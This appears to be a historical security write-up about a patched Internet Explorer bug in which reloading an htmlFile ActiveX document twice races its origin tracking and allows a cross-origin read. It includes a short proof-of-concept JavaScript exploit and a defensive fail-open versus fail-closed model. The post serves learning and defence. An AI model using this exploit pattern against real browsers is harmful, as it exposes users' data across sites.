The htmlFile ActiveX object creates a hidden in-process HTML document. By having an IFrame write to it, reloading it twice in quick succession, and then reading its body, I was able to access content from a cross-origin context.

axDoc = new ActiveXObject("htmlFile");
window[0].execScript("top.axDoc.write(1); top.axDoc.close();");
axDoc.parentWindow.location.reload();
setTimeout("axDoc.parentWindow.location.reload();", 200);
// After second reload:
alert(axDoc.body.innerText); // Cross-origin read

The double reload created a race condition in the document’s origin tracking. After the first reload, the htmlFile document’s security context was in a transitional state; the second reload while in that state caused the origin checks to be bypassed, leaving the document’s content readable from the attacker page.
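The failure class described above, an access check that passes while the origin is unsettled, can be shown with a small model next to its fail-closed form. This is an added example, not code from the original post and not IE's implementation; `ModelDocument`, `readBodyFailOpen`, `readBodyFailClosed` and the origins are hypothetical names chosen for illustration.

```javascript
// Simplified model; every name here is hypothetical, not an IE internal.
class ModelDocument {
  constructor(origin, body) {
    this.origin = origin;     // settled security origin
    this.body = body;
    this.reloading = false;   // true while a reload is in flight
  }
  beginReload() {             // origin is unset until the reload completes
    this.reloading = true;
    this.origin = null;
  }
  finishReload(origin, body) {
    this.origin = origin;
    this.body = body;
    this.reloading = false;
  }
}

// Weak check: an unset origin is treated as "nothing to compare" (fails open).
function readBodyFailOpen(callerOrigin, doc) {
  if (doc.origin !== null && doc.origin !== callerOrigin) {
    throw new Error("access denied");
  }
  return doc.body;
}

// Hardened check: an unsettled or mismatched origin is always a denial.
function readBodyFailClosed(callerOrigin, doc) {
  if (doc.reloading || doc.origin === null || doc.origin !== callerOrigin) {
    throw new Error("access denied");
  }
  return doc.body;
}

function attempt(check, callerOrigin, doc) {
  try { return check(callerOrigin, doc); } catch (e) { return "DENIED"; }
}
// Constructed origins and content; returns [failOpen, failClosed] per phase.
function demo() {
  const caller = "https://a.example";
  const doc = new ModelDocument("https://b.example", "b-only content");
  const both = () => [attempt(readBodyFailOpen, caller, doc),
                      attempt(readBodyFailClosed, caller, doc)];
  const settled = both();
  doc.beginReload();
  const transitional = both();
  doc.finishReload("https://b.example", "b-only content");
  return { settled, transitional, afterReload: both() };
}
```

Both checks deny the cross-origin read once the origin is settled; only the fail-open check returns the body during the transitional window, which is why the hardened form treats "origin not yet known" as a denial.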

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.